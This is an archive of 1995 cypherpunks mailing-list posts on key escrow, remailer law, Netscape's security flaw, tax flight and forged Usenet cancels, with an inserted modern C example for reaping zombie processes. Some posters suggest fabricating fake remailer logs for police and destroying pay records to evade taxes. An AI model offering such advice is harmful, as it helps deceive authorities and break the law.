Also an incentive for jurisdictions to engage in a beneficial "Dutch 
Auction" in which they offer lower and lower tax rates to attract 
employers and employees.

> Who are you going to work for?  The publisher who is based in New York 
> and reports all payments, or the publisher who works in the Cayman 
> Islands, reports nothing, and merely sells the manuscript to the big name 
> publisher in New York after purchasing it blind from you?

And as the intellectual components of goods and services are increasingly 
unbundled from the physical for efficiency reasons (greater range of 
competitors made possible) more work can be done at a distance.  

> When this is true, the most profitable venture in the United States will 
> be retail smuggling.  And as taxes are raised again and again, compliance 

Fairly easy these days with drop shipping of goods by third parties and 
the bypassing of retail distribution chains for more and more goods.

In any case, if goods end up being a smaller portion of Gross World 
Product, taxes on them become less significant.  The existence of 
taxation of physical goods certainly tips things in favor of the untaxed 
non physical goods and services.

Note that agriculture once made up 95% or more of GWP.  It doesn't any 
more.  Non physical goods like entertainment, financial services, etc can 
grow to dominate the world economy because they adapt well to cheap 
distribution over the nets.

In the Progress and Freedom Foundation's Friction Free Capitalism, taxes 
are a big part of the "friction" that is disintermediated.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Sun, 15 Oct 95 16:48:39 PDT
To: cypherpunks@toad.com
Subject: Re: I am looking for a way to create a zombie process
In-Reply-To: <9510151556.AA26716@all.net>
Message-ID: <45s6kc$t5r@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <m0t4X3e-000DgnC@yage.tembel.org>,
Michael Shields <shields@tembel.org> wrote:
>> Is there anyone who can give me a simple program or set of commands that
>> creates a zombie process? Thanks in advance. 
>
>Here, public domain.
>
<snip>
>	wait();
<snip>

wait(NULL); would be saner.

   - Ian
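
The correction above, as an added example (not code from the thread; the snipped program is not reproduced here): `wait()` is declared as `pid_t wait(int *status)`, so a bare `wait()` hands the kernel an undefined pointer, while `wait(NULL)` reaps the child and discards its status. The names `zombie_lifecycle` and `struct zombie_report` are hypothetical, chosen for this sketch.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for waitid(), siginfo_t, WNOWAIT */
#endif
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* What the parent observed during one zombie life cycle (hypothetical type). */
struct zombie_report {
    int was_zombie;   /* 1 if the child had exited but was still unreaped  */
    int exit_status;  /* child's exit code as reported by waitid()         */
    int reaped_ok;    /* 1 if wait(NULL) returned the child's pid          */
    int gone_after;   /* 1 if waiting for the pid again fails with ECHILD  */
};

/*
 * Fork a child that exits at once, confirm it sits in the zombie state,
 * then reap it with wait(NULL). Returns 0 on success, -1 on a system error.
 */
int zombie_lifecycle(int child_exit_code, struct zombie_report *r)
{
    siginfo_t info;
    pid_t pid, reaped;

    memset(r, 0, sizeof *r);
    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(child_exit_code);   /* child: terminate immediately */

    /*
     * WNOWAIT blocks until the child has exited but leaves it waitable.
     * From here until the wait(NULL) below, the child is a zombie: it has
     * no memory or open files, only a process-table slot holding its status.
     */
    memset(&info, 0, sizeof info);
    if (waitid(P_PID, (id_t)pid, &info, WEXITED | WNOWAIT) != 0)
        return -1;
    r->was_zombie = (info.si_pid == pid && info.si_code == CLD_EXITED);
    r->exit_status = info.si_status;

    /*
     * Reap it. NULL says "discard the status". With an old-style declaration
     * a bare wait() compiles, but the kernel then writes the status through
     * whatever garbage sits in the argument slot (or fails with EFAULT).
     */
    reaped = wait(NULL);
    r->reaped_ok = (reaped == pid);

    /* The process-table entry is now released; the pid is no longer ours. */
    errno = 0;
    r->gone_after = (waitpid(pid, NULL, 0) == -1 && errno == ECHILD);
    return 0;
}

int main(void)
{
    struct zombie_report r;

    if (zombie_lifecycle(7, &r) != 0) {
        perror("zombie_lifecycle");
        return 1;
    }
    printf("zombie before reap: %d, exit status: %d, reaped: %d, gone: %d\n",
           r.was_zombie, r.exit_status, r.reaped_ok, r.gone_after);
    return 0;
}
```

A parent that never calls `wait` leaves every exited child in the state shown between the `waitid` and `wait(NULL)` calls, which is how long-running daemons end up filling the process table.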




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sun, 15 Oct 95 19:57:17 PDT
To: cypherpunks@toad.com
Subject: Why commercial key escrow? [Re: My chat with Goeff Greiveldinger]
In-Reply-To: <aca70b991b0210041885@[205.199.118.202]>
Message-ID: <199510160257.TAA23550@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> tcmay@got.net (Timothy C. May) writes:
> The question I have is this: Why is the Justice Department even involved at
> all if it is truly only about _commercial_ key escrow?

DoJ is involved because industry didn't buy into Clipper-type GAK, and the
FBI still wants to be able to read encrypted files, as well as encrypted
phone conversations if they ever turn up.  The White House is willing to
help, but not to the extent of making GAK mandatory.  However, they (WH
and FBI) are hopeful that forcing either GAK or weak encryption on the
export market will encourage companies to build single systems that they
can both export and sell domestically, which would make the domestic ones
weak or GAKed as well.  DoJ is involved with the commercial escrow because
they (or NIST or somebody) expect to be certifying the export escrow
companies, which they hope will be the same operations.  As a data point,
Dorothy Denning is increasingly pessimistic that this plan will in fact
result in the same weak or escrowed system being used domestically; if it
doesn't, that presumably triggers Louis Freeh to head back to the Hill for
more legislation.

I don't know what they intend to do about PGP-like systems, but I suspect
that's a second-order concern; the first-order concern must be avoiding
the situation where Microsoft builds unGAKed 3DES into Word.

	Jim Gillogly
	Trewesday, 25 Winterfilth S.R. 1995, 02:51





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 15 Oct 95 19:48:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PA Remailer Concerns
Message-ID: <aca715081d0210044fe2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:13 AM 10/16/95, Futplex wrote:

>I would very much like to see this law tested. I think it could prove fairly
>important to attack it with a well-planned, benign test case rather than wait
>for the next National Liberation spam or a death threat.
>
>I don't live in PA, but I would be willing to participate as the defendant in
>a test case under the right circumstances. Presumably I would open an
>account with an ISP in Penna., set up a remailer on the account (need to find
>an ISP that clearly allows that), and have somebody send a message through it.
>
>We would need to design a promising test case and find an attorney willing &
>able to offer pro bono services.

I'm not a lawyer, though I hang out on the "Cyberia" list and I watched a
lot of the OJ trial. :-}

Seriously, it is hard to "design a promising test case" in this way.
They--the Pennsylvania law enforcement authorities--don't have to take the
bait. They can just do nothing, until an incident arises which provokes
them. Maybe next year, maybe five years from now. Such an incident is
likely to be one that they figure will make for a popular prosecution. One
of the Four Horsemen, probably.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 15 Oct 95 17:28:39 PDT
To: perry@piermont.com
Subject: Re: what are these people selling????
Message-ID: <9510160025.AA08409@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Jim Bidzos and some of us might have interesting interactions on
>patent issues, but I've got to emphasize that he's no demon. He's a
>guy trying to make a buck on his patent properties -- by and large he
>has the same interests about seeing cryptography spread that the rest
>of us do.

Only until the patents expire.  He's no demon, but there's no altruism at
work.  Come the millennium he moves to things like selling cars.

You heard it here first.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 15 Oct 95 21:14:44 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
Message-ID: <199510160413.VAA28410@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Derek Atkins wrote:

> >         Why would a company like Netscape jeopardise themselves by
> > even letting out a beta version so hackers have time to find bugs
> > before the full version is released. Don't take me wrong I have only
> > been on the net fer a little over a year and Love Netscape.  And If I
> > knew what I was Doing I would love to help them.....
>
> I don't think that this can jeopardize a company...

I agree.  I don't think it can jeopardize the company either.  After all,
we're talking about a company that has a market capitalization of more
than TWO BILLION US DOLLARS.  Two Billion Dollars can buy a lot of talent. 

Even if Netscape has to spend $100 Million on this problem, that sum
represents only 5% of Netscape's total market capitalization. 

I'm certain that Netscape has established a crisis control centre which is
manned and readied.  That a proper spin control program has been
implemented, and that a reasonable firm like Skadden Arps has been
retained. 

And I'm confident, that Netscape is drawing not only on its own resources
but that it's drawing on those who share Netscape's interests. 

Even if Skadden doesn't let you past security without a seven figure
retainer, I'm sure that if one of those nice boys from Morgan Stanley, ...
someone with snazzy Princeton ties ... maybe one of the ones who
orchestrated the Netscape IPO calls over to Skadden, Arps, Slate, Meagher
& Flom, I'm sure that one of those fellows will have their call returned
by any partner at Skadden. 

They're professional that way.

> What would you
> rather see?  A company makes a beta release for people to attempt to
> break, fixes the bugs, and then releases a better product?  Or would
> you rather see a company release a product, tell people it is secure,
> and then get bitten by numerous holes in it?

Well, I'm not sure that I'd want to make any representations or imply any
warranties whatsoever. 

> From a PR perspective, it sounds much better to take the first tact.
> Similarly, you will get a better product using the first method.
> Using the second method, NOT beta-testing your product, has a greater
> chance of jeopardizing a company.  At least if they put out a beta, if
> the press calls, they can say "this is not our final product -- we
> wanted to let people give it a try and find problems, so that we can
> fix them before we start shipping".

We aren't just talking about a pre-alpha (Netscape beta) product.

We are speaking of something else here.  We're talking not only about a
problem in their NEW code, we're talking about a very big problem in the
middle of their EXISTING code.  A huge security hole in the code that
everyone is and has been running -- from 850,000 Deutsche Telecom
customers, throughout AT&T's internal organization and throughout their
worldwide customers, and god only knows how many individuals in the United
States and abroad.

This is an extremely serious software design issue.  It is equivalent
to designing and then building a house and forgetting to include any
plumbing, and no one really noticing, and no one really saying anything 
about it.

And when someone like Joan Rigdon calls from the Wall Street Journal, I 
hope that Netscape doesn't try to snow her.

She's been up and down the street ... and probably knows all about snow.


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 15 Oct 95 19:32:27 PDT
To: cypherpunks@toad.com
Subject: Next EFF-Austin General Meeting : Cryptography (fwd)
Message-ID: <199510160233.VAA01932@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
From bladex@bga.com Sun Oct 15 14:49:25 1995
Date: Sun, 15 Oct 1995 14:48:36 -0500 (CDT)
From: David Smith <bladex@bga.com>
Subject: Next EFF-Austin General Meeting : Cryptography
To: eff-austin@zilker.net
cc: austin-cpunks@einstein.ssz.com
Message-ID: <Pine.3.89.9510151441.A25318-0100000@urchin.bga.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII


                              Cryptography
         The Language Our Government Doesn't Want You to Learn

                       EFF-Austin General Meeting
                 Monday, October 16th, 7:00 to 9:00 p.m.
                   La Madelein Inn, 3418 North Lamar

The rights of individuals to live freely in a democracy versus the
powers society grants law enforcement to fight crime is one of the
longest running and one of the most contested debates in American
history.

Cryptography -- the ability to communicate in an encoded language -- is
merely the latest incarnation. This general meeting is designed to
provide an overview of the issues as well as an update on current events
of the last six months.

Areas of discussion include

        -- what is being called the "CLIPPER II" proposal -- the Clinton
        administration is willing to ease export restrictions on high
        strength cryptographic algorithms if an escrow decryption key is
        available where law enforcement officials have access to it.
        Speaker : David Smith, President EFF-Austin

        -- the recent cracking of a Netscape cryptography algorithm
        advertised as "secured" and its implications for the
        development of electronic commerce on the Internet. One function
        of cryptography is that it provides a unique identifier. If you
        can't be reasonably sure that the person at the other end of the
        connection is who you think it is, just how much money are you
        willing to risk in an electronic transaction?
        Speaker : Brian Combs, President Austin World Wide Web Users
        Group; Austin Web Publishing; and Board member, EFF-Austin.
        
        -- Pretty Good Privacy.  What is PGP, how does it work, who is
        Phil Zimmermann, and what is the legal status of all of this?
        Copies of PGP will be made available, as well as laptops to use
        for generating keys and keyrings.
        Speaker : Jim McCoy, Austin Cypherpunks.

Other topics are sure to be discussed; this is just a starting point for
discussion.
           
EFF-Austin is a local grass roots organization created to protect civil
liberties in cyberspace.  We provide educational forums on the social,
legal, and political consequences of cyberspace.

For further information, contact EFF-Austin President David Smith via
e-mail (bladex@bga.com).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 15 Oct 95 21:36:32 PDT
To: cypherpunks@toad.com
Subject: "Corporatocracy"
Message-ID: <aca72c2c1f021004bf81@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:42 AM 10/16/95, Michael Froomkin wrote:
>Those seeking more info on the conference will find it at:
>Http://www.multicorp.com/wec.
>
>They are asking over $500 in registration fees, which strikes me as wildly
>excessive, so I'm not advocating attendance.


Excessive registration costs for conferences have long bothered me, as
Michael knows first-hand.

I just declined to go to the Hacker's Conference this year because the
registration has risen to $400 for 2 days. That they supply a midnight
buffet is hardly justification for charging $200 a day, in my opinion. (My
direct comparison is to science fiction conventions, where the hotel rooms
run $70 a day and overall registration--with a nice program book!--is $40
or less.)

Doug Barnes informed me that the money laundering conference, for which he
wrote those great trip reports, cost $1000 for two days (gulp!). His
corporation picked up the tab, natch.

It's pretty clear to me that things are getting out of hand. I find myself
priced out of most conferences, not because I can't "afford" them, but
because I find paying $400 or $600 or more for a short conference to be a
poor use of my money, compared to other things (like mortgage payments,
books, investments, new doodads for my computer, toys, vacations, etc.).

Conferences seem to be priced to take advantage of the tax laws and to soak
corporations, which can write off the conferences. (No, I find there is no
way I can "write off" the various conferences I'd like to attend.)

Needless to say, I'm not saying conference organizers don't have the
"right" to charge these exorbitant fees. Clearly they find customers. But
it's also my right to avoid these "conference taxes."

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 15 Oct 95 19:13:48 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PA Remailer Concerns
In-Reply-To: <199510152238.AA43670@junkers.lochard.com.au>
Message-ID: <199510160213.WAA07796@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[I'm sending this to the cypherpunks and remailer-operators lists. Replies
are directed to c'punks, just to avoid crossposting followups, but I read
both lists. -Futplex]

Mark writes:
[re: a new Pennsylvania law]
> More likely the law will be used when a remailer operator won't play ball with
> the local LEA and surrender any existing logs. Then the LEA can simply throw
> the operator into a court under this legislation.
> 
> If (when?) something serious is perpetrated and planned using a remailer then
> they will have the motivation to shut them down.

I would very much like to see this law tested. I think it could prove fairly
important to attack it with a well-planned, benign test case rather than wait
for the next National Liberation spam or a death threat. 

I don't live in PA, but I would be willing to participate as the defendant in
a test case under the right circumstances. Presumably I would open an
account with an ISP in Penna., set up a remailer on the account (need to find
an ISP that clearly allows that), and have somebody send a message through it.

We would need to design a promising test case and find an attorney willing &
able to offer pro bono services. 

Any comments or suggestions, esp. from legal types (who of course are not
offering formal legal advice to anyone :) ?  Is this realistic ?  What would
it take to elicit a prosecution for such a test case ?

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 15 Oct 95 19:16:24 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <Pine.3.89.9510151747.D61174-0100000@aix2.uottawa.ca>
Message-ID: <Pine.SUN.3.91.951015221121.29505A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995 s1018954@aix2.uottawa.ca wrote:
 
 
> On Sun, 15 Oct 1995, Black Unicorn wrote:
> 
> > Effectively the potential for misuse is increased by virtue of the 
> > increased numbers of officials (commercial and public) who have access to 
> > the material.
> 
> Does he mean mandatory commercial key escrow (as in clipper keys held
> by credit agencies?) Or something totally voluntary but standardized
> by the gov? 

The problem exists in both these examples.

>  
> Of course it all depends on exactly why they really want the escrow anyway.
> If people will encrypt a second time with tomorrow's pgp, why should anyone
> care? 

When you see a glaring hole in argument for a government program, you 
should smell the stench of fish in the air.  That is the section of the 
puzzle that is being hidden until a politically "ripe" time to stick it 
in place.  Here that piece is, obviously, banning tomorrow's pgp.

> 
> All you'd single encrypt for would be your income tax and the 
> financial records you're already required by law to keep (I'm sure I've
> misunderstood this. Can't be so useless.). I know that's not a particularly
> diplomatic carry-over from the debated-to-death clipper thing, but really,
> except as PR, why DO they still take this seriously? (unless you want to 
> be paranoid about a ban, hmm, nevermind, debated-to-death)

I'm not so sure it's paranoid.  You have trial balloons floating all 
over.  Freeh is a prime example, and no one is screaming loudly enough to 
shoot down his blimp.  That's a big'ole green light for regulators.

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <MAILER-DAEMON@usmc.mil>
Date: Sun, 15 Oct 95 19:23:16 PDT
To: <cypherpunks@toad.com>
Subject: Undeliverable Message
Message-ID: <vines.TnY7+96QUka@alairmd1.ala.usmc.mil>
MIME-Version: 1.0
Content-Type: text/plain


To:            <cypherpunks@toad.com>
Cc:            <remailer-operators@c2.org>
Subject:       Re: PA Remailer Concerns

Message not delivered to recipients below.  Press F1 for help with VNM
error codes.               

	VNM3043:  CPL JASON P JONES@IRM711@MCLB Albany


VNM3043 -- MAILBOX IS FULL.

   The message cannot be delivered because the
   recipient's mailbox contains the maximum number of 
   messages, as set by the system administrator.  The
   recipient must delete some messages before any
   other messages can be delivered.
   
   The default limit is 1000 messages.  Administrators 
   can set lower limits if required using the Change
   mailbox settings function available in the Manage
   User menu (MUSER).  The 1000 message limit is the
   maximum allowed by the Mail program.  If this limit
   is reached, the recipient must delete some of
   the messages before the mailbox can accept any more
   incoming messages.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 19:32:40 PDT
To: Mark <mark@lochard.com.au>
Subject: Re: PA Remailer Concerns (and one very stupid joke)
In-Reply-To: <199510152238.AA43670@junkers.lochard.com.au>
Message-ID: <Pine.3.89.9510152144.D11124-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 16 Oct 1995, Mark wrote:

> More likely the law will be used when a remailer operator won't play ball with
> the local LEA and surrender any existing logs. Then the LEA can simply throw
> the operator into a court under this legislation.

Make fake logs. A random log generator with the e-mail addresses of the 
country's state, municipal and federal legislators, schoolchildren and a 
random sampling of the (*!ahem!*) tamer usenet groups would make for an 
excellent seed file. 

I really don't see there being very much enforcement following an initial case.

It would do wonders for Nobody, an12345 and Tommy de Tourist's (as Tim's sig 
puts it) reputations, wouldn't you say?

> The above opinions are rumoured to be my own. 
You aren't sure either, eh?

On the banque des cypherpunks front, I recently pinged cthulhu.com as a joke.
It worked. One wonders if the offshore and underwater Ryleh inc. is 
passing itself off as a PPP account as it prepares to resurface. They're
just waiting for a sign. I know who my banker's gonna be. Somehow I don't
think US jurisdiction extends just that far. Takes care of black 
securities & banking probs too. Who'd dare to cross the big boss?

(looking forward to anonymous, untraceable, digital ftagn$)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 15 Oct 95 19:26:26 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <Pine.SUN.3.91.951015191827.6604A-100000@panix.com>
Message-ID: <Pine.SUN.3.91.951015221647.29505B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, Duncan Frissell wrote:

> 
> 
> On Sun, 15 Oct 1995, Black Unicorn wrote:
> 
> > Were I an overseas employer, I would be quite happy to work in a 
> > "disinterested" jurisdiction and hire American workers to telecommute and 
> > issue their pay blindly to the number only or crypto bank account of their 
> > choice and promptly encrypt or lose the records.
> 
> Thanks for responding, Black (if I may call you Black), it means I don't 
> have to.

'uni' sounds a lot less charged, but it doesn't matter much to me.
My pleasure.
 
> > Remember, there is an incentive for employERS as well as employees to 
> > flee the tax system of a nation that is manipulative of it.  Employers 
> 
> Also an incentive for jurisdictions to engage in a beneficial "Dutch 
> Auction" in which they offer lower and lower tax rates to attract 
> employers and employees.

"Race to the bottom" this is usually called by statists who dislike the 
effect.  It's also applied to things like environmental regulation, 
where (for example) many businesses in Illinois moved to Indiana when it 
became clear that Indiana was much more corporate friendly because their 
'office paper' disposal "tax" was zero, and Illinois was significant 
enough to make small business feel the pressure.  (No, I'm not kidding)  
Of course, losing the business, Illinois upped the ante and eliminated 
the tax altogether and coupled it with some kind of incentive.  
Indiana countered and so forth.  Everyone won, of course, in that the 
total number of small businesses in both states outgrew economic growth over 
the period, but the leftists had a fit.  Wealth maximization is not a 
concept that is easily understood by greedy statists who want MORE and 
want it NOW.  I am amused that this strata of market forces is 
never recognized as market forces, but just dirty nasty states shooting 
important regulation down.


> DCF


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 15 Oct 95 19:39:19 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <aca70b991b0210041885@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951015223314.5441B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May asks why Greiveldinger is invited (or, more to the point, why he 
accepted the invitation).

I don't know.  There are fun legal issues, not all arising from contract 
here.  In particular, assume for a moment that (1) the government offers 
"escrow" services and/or (2) the government requires that >40 bit 
encryption products include mandatory US govt-approved escrow as a 
precondition for export clearance [the NIST trial balloon].

Under (1) your participation in the escrow is not necessarily 
"voluntary"; a similar, if less powerful, argument can be made under 
(2).  Also, when the government provides the "escrow service" different 
liability rules may apply.

FWIW, My guess is GG is going because the right person asked him.  That's 
why I'm going, and that's how Washington works...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 15 Oct 95 19:42:21 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <Pine.SUN.3.91.951015221121.29505A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.951015223954.5441C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Those seeking more info on the conference will find it at:
Http://www.multicorp.com/wec.  

They are asking over $500 in registration fees, which strikes me as wildly 
excessive, so I'm not advocating attendance.

The third member of my panel, Frank Sudia of Banker's Trust has pulled 
out, so don't believe everything you read either.  I might post the 
outline of my talk in a day or two if I get around to translating my 
cryptic jottings into ASCII.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 15 Oct 95 22:42:59 PDT
To: cypherpunks@toad.com
Subject: Bug Bounty [noise]
Message-ID: <199510160542.WAA09463@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Something I noticed about the Netscape Bug Bounty that seems to not have
been mentioned here...

        "Linux users need not apply."

(Check the rules as to which versions qualify and see what I mean.)
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sun, 15 Oct 95 20:00:49 PDT
To: anonymous@replay.com (Nobody in particular)
Subject: Re: Illegally canceled articles on Microsoft Security Bugs
In-Reply-To: <199510160231.TAA10813@Networking.Stanford.EDU>
Message-ID: <9510160300.AA27823@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	I would discount the possibility of the cancellations being by a
Microsoft employee. I spoke to a very senior Microsoft person who was well
aware that security of Microsoft products would be examined and that chances 
are that bugs would be found. Point being that they would much prefer them
to be discovered by people who tell them about the bugs rather than people
who aim to exploit them.

	If you have pissed off the Church of Satan then what do you expect?
They will get what is coming to them sooner or later and I expect that it 
will take judicial and unpleasant form.

		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Sun, 15 Oct 95 23:29:26 PDT
To: postmaster@microsoft.com
Subject: Forged cancels of posts critical of Microsoft, *apparently* through internetmci.com or nasa.gov
Message-ID: <199510160629.XAA11766@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

These are the forged cancels for my articles critical of Microsoft. *Many
Thanks* to the person who forwarded them to me; our server expires control
way too fast.

Somebody did an acceptable forge on the Message-ID, but the Path is quite
wrong. Can anybody help me catch this fool? I'm somewhat out of my element
here.

The most serious posts are available on the Web at
http://www-leland.stanford.edu/~llurch/win95netbugs/IP-Security-Bug.txt.asc,
and on the gopher archive at gopher://quixote.stanford.edu/1m/win95netbugs.

- -rich graves
 networking systems
 stanford university
 llurch@networking.stanford.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIH0IIND7LjhcPQ9AQFojQP/UrB/Us1PK8ne1GnsFxqXXVCJpanEKciH
p9wqVMfBJOTBdkYBHkuSHkdeaJfXz6QfEQYGZr6HIN/DD8A/VNOSB+dgCbBUYcOj
2/b+x+7CBfGvEsrbIVLxWl/Eua5pIcjWLLmfgYu3dCneDOqrXO9ehZSDg1JD9tTt
Av6lQIxTuVM=
=V+nf
-----END PGP SIGNATURE-----

[You always think of something after signing, don't you?]
Also emailed to postmaster@internetmci.com and  postmaster@news.msfc.nasa.gov. 
Was that right? Doesn't microsoft.com get its news feed from internetmci? 
OK, I'll Cc them, because I know they don't want anyone to believe that 
this was done by a Microsoft employee.

The cancel for 
<Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.EDU>, only,
is legitimate, and provides a very good comparison. I'm sure the forger 
studied it; so should we.

Path: rand.org!usc!howland.reston.ans.net!swrinde!elroy.jpl.nasa.gov!sdd.hp.com!
hplabs!unix.sri.com!news.Stanford.EDU!not-for-mail
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Newsgroups: comp.os.ms-windows.win95.misc,comp.infosystems.www.browsers.ms-windo
ws,comp.os.ms-windows.apps.winsock.misc,alt.winsock,comp.os.ms-windows.networkin
g.tcp-ip,comp.protocols.tcp-ip.ibmpc
Subject: cmsg cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanfo
rd.EDU>
Control: cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.ED
U>
Date: 13 Oct 1995 15:55:40 -0700
Organization: Stanford University
Lines: 1
Message-ID: <45mqpc$hn@Networking.Stanford.EDU>
NNTP-Posting-Host: networking.stanford.edu

<Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.EDU> was cancelled
 from within trn.

Path: rand.org!usc!howland.reston.ans.net!newsfeed.internetmci.com!news.msfc.nas
a.gov!elroy.jpl.nasa.gov!sdd.hp.com!hplabs!unix.sri.com!news.Stanford.EDU!not-fo
r-mail
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Newsgroups: comp.os.ms-windows.win95.misc,comp.infosystems.www.browsers.ms-windo
ws,comp.os.ms-windows.apps.winsock.misc,alt.winsock,comp.os.ms-windows.networkin
g.tcp-ip,comp.protocols.tcp-ip.ibmpc
Subject: cmsg cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanfo
rd.EDU>
Control: cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.ED
U>
Date: 13 Oct 1995 15:58:14 -0700
Organization: Stanford University
Lines: 1
Message-ID: <45mqu6$iu@Networking.Stanford.EDU>
NNTP-Posting-Host: networking.stanford.edu

<Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.EDU> was cancelled
